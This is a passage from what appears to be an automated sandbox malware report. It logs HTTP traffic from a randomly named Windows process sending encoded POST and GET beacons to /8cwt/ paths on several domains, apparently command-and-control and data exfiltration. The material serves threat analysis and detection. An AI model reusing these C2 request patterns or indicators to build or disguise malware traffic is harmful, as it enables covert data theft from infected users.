                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRSWC7Y7gLV0TybEBnkXyZfpB5fbeKAT3GlvCxkqM5mLCUTmL2I7osu4YtObGbSh1IaZeLrin9AXV5S/2o9nJilLxSq3jrkdS9HAxaeiHouKTEAUhcpIZ0kGVq1jB7rK2XjrSQClthTj5lqvH06tkCzmKV+F1aZzSaBdQdvhQmNKhXFbyC5sXamk6B800T9pre06TRJq1bpZs=
                                      Jun 4, 2024 14:18:29.506695032 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:18:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      23 | 192.168.11.30 | 49871 | 93.125.99.134 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:31.663012981 CEST | 1617 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:32.250478029 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:18:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      24 | 192.168.11.30 | 49872 | 93.125.99.134 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:34.440659046 CEST | 425 | OUT | GET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:34.802649975 CEST | 549 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Tue, 04 Jun 2024 12:18:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 0
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      x-redirect-by: WordPress
                                      location: http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6
                                      x-litespeed-cache: miss
                                      x-turbo-charged-by: LiteSpeed
                                      Server: LiteSpeed


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      25 | 192.168.11.30 | 49873 | 34.232.203.70 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:40.125907898 CEST | 674 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=xdHu5fC/8uEzGBvc06KZLLWt7Iu6rYZanLManAWP4M2fCEvnTxC4cD7fSHbv/FPYLKTOQO6XmZX9AlEgbiibzwW4WIl5uU0R+KHJvVu1XCvwkYfOsiSyBeSLJzNk85s9IY8CDEoAT8pntI1HK6Qb2M5+H7tUf4nK9rk1az6658AT9gPqjVc2y/8rMtju/DkmJQ==
                                      Jun 4, 2024 14:18:40.259381056 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:40 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      26 | 192.168.11.30 | 49874 | 34.232.203.70 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:42.786621094 CEST | 694 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=xdHu5fC/8uEzHh/c2bKZJrWq0ou6k4YRnKwanA+l4+ifDmnnS1u4Sj7fL3bgh1PfLKPsQPGXmf79Ak0gbRaYzgW6eol3qU0R+KHJvVKPXCHwnovOuHmxCeSMIzNkvpsHIY8gDF06T6tntK9HELQYls58LrsbX5ac+aUCVRa9wu02xX+w+Wo0hfAGQsOG9Bl9UbtPoupztkpvZ6+ASB2vJKQ=
                                      Jun 4, 2024 14:18:42.917536974 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:42 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      27 | 192.168.11.30 | 49875 | 34.232.203.70 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:45.443568945 CEST | 1611 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX= [TRUNCATED]
                                      Jun 4, 2024 14:18:45.577114105 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:45 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      28 | 192.168.11.30 | 49876 | 34.232.203.70 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:48.102632999 CEST | 423 | OUT | GET /8cwt/?24eluX=8fvO6riwiNdGIieTsu/tMoq1+6O9galEvK05+Szv2OjuFl7+WHHAVTXMU1G96mraFYLMRcvsh+SJXHUnSCy+mSK3fOJTqBcOyoKopFv0eDv6jorQ0HypEvo=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:48.235074043 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:48 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:18:48.235451937 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      29 | 192.168.11.30 | 49877 | 92.205.8.26 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:53.603776932 CEST | 701 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.belgravevilla.com
                                      Referer: http://www.belgravevilla.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=ycavfa8XU+izd547Y6H+wvwYjSlDSmUL7QiArp1ZtzWLNR/BSQxzvII9nlre7wN7RniRw8ojkL8Hf9dRECfcuM23xqCdfNdvrFQgv4Yfevyf3cxr5K6F2hMtrBWKuE1X4DB+1EKfzrwjfOH0JIUwKLkuW/HKx73wspKR0RuLmXCEHFmpoPa3itDopswBgiKLhQ==
                                      Jun 4, 2024 14:18:53.879776955 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:53 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Content-Length: 2508
                                      Content-Type: text/html; charset=UTF-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      30 | 192.168.11.30 | 49878 | 92.205.8.26 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:56.360236883 CEST | 721 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.belgravevilla.com
                                      Referer: http://www.belgravevilla.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=ycavfa8XU+izcZI7X7H+2Pwb/ilDdGUP7QmArsNJtFGLNznBRRxzqII9tFrX2QN8RneZw+sjkKcHf9NRER3f8s214KCfRtdvrFQgv4M5esCf3MBr5r7T/BMu7RWKkU1T4DBQ1Bu1zpIjfP30IcIzd7koLvHe1KaVjqm8/z6PhCWzPyXz1Mu1xN/F1tdpigLQ8X/MGmcjDLoN+ILOQlzYHOg=
                                      Jun 4, 2024 14:18:56.634248018 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:56 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Content-Length: 2508
                                      Content-Type: text/html; charset=UTF-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      31 | 192.168.11.30 | 49879 | 92.205.8.26 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:18:59.108072042 CEST | 1638 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.belgravevilla.com
                                      Referer: http://www.belgravevilla.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:59.382074118 CEST | 1289 | IN | HTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:59 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Content-Length: 2508
                                      Content-Type: text/html; charset=UTF-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      32 | 192.168.11.30 | 49880 | 92.205.8.26 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:19:01.857976913 CEST | 432 | OUT | GET /8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:02.408593893 CEST | 546 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Tue, 04 Jun 2024 12:19:01 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      X-Redirect-By: WordPress
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Location: http://belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6
                                      Vary: Accept-Encoding
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      33 | 192.168.11.30 | 49881 | 3.64.163.50 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:19:07.791268110 CEST | 683 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.insist.site
                                      Referer: http://www.insist.site/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=sD9vPhgpDEwZztN92/g10AhaLh0Pb36SQscioycialbwc+6E8qDzJ81181o1u8SzgOUhUv0HPeYQxtiR8kGOl2hc5dVxnzO+SWiWHsronS0RiQxnVfrpXRUxSkplkEo9uzIb7ssuHD9GNbfnHOx8L35/QfxNg5YBYaaHVkzeenu30LudUu8FK9sTV3gU7V6ycw==
                                      Jun 4, 2024 14:19:08.011444092 CEST | 289 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:07 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      34 | 192.168.11.30 | 49882 | 3.64.163.50 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:19:10.538608074 CEST | 703 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.insist.site
                                      Referer: http://www.insist.site/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=sD9vPhgpDEwZi89968I11ghZXx0POn6OQsQiozJ/aQLwfeKE9rDzK8113Vo0hcS8gOYpUr0HPekQxoeR9XuJlmg629VzqTO+SWiWHtO1nS8RihBnW+rqJBUyC0pluko5uzJO7tAEHBFGNZHnAfxzF346d/wplJZOcbe6RmbdcnvI48fHJtIHZdQ+J2N85X7pB5CTB5D5YjN/k4BZKaMP2Fg=
                                      Jun 4, 2024 14:19:10.756767988 CEST | 289 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:10 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      35 | 192.168.11.30 | 49883 | 3.64.163.50 | 80 | 2980 | C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Jun 4, 2024 14:19:13.290023088 CEST | 1620 | OUT | POST /8cwt/ HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.insist.site
                                      Referer: http://www.insist.site/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:13.509655952 CEST | 289 | IN | HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:13 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      36  192.168.11.30  49884  3.64.163.50  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:16.037266016 CEST  426  OUT  GET /8cwt/?24eluX=hBVPMRA8AXkfi8sX3ZU3xUlYATFWOWKaW/82pjFjYWbiYeLOxLODNY5T0HEKtdu9psozILhwOJRChZ+L+nmp0Ast2pFtgkKWXgnlG+28tA4JhCFPXI/mZUw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.insist.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:19:16.255780935 CEST  289  IN  HTTP/1.1 410 Gone
                                      Server: openresty
                                      Date: Tue, 04 Jun 2024 12:19:16 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Ascii: 7<html>9 <head>4b <meta http-equiv='refresh' content='0; url=http://www.insist.site/' />a </head>8</html>0


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      37  192.168.11.30  49885  91.195.240.19  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:38.111289024 CEST  686  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.nurenose.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.nurenose.com
                                      Referer: http://www.nurenose.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Ascii: 24eluX=gYXxWfa9qOoqctGa9c+QGfhQsopKh14TF+NbzFfr6gKB8qN9g06DHSSCvcBNgRbYo/SQmxteYfPYpplZmrhMo3u5DNp0YO4gGM6lBoYYV5P+948vXzMKXAyPg880YVuIaGQ7a5s0/kK5m8p92VrXxQGX3aD9r+zvtwGcxrQaerB6KKxgykoJ4wzEpjSpyR+rRA==
                                      Jun 4, 2024 14:19:38.335360050 CEST  208  IN  HTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                      38  192.168.11.30  49886  91.195.240.19  80  2980  C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Timestamp  Bytes transferred  Direction  Data
                                      Jun 4, 2024 14:19:40.869891882 CEST  706  OUT  POST /8cwt/ HTTP/1.1
                                      Host: www.nurenose.com
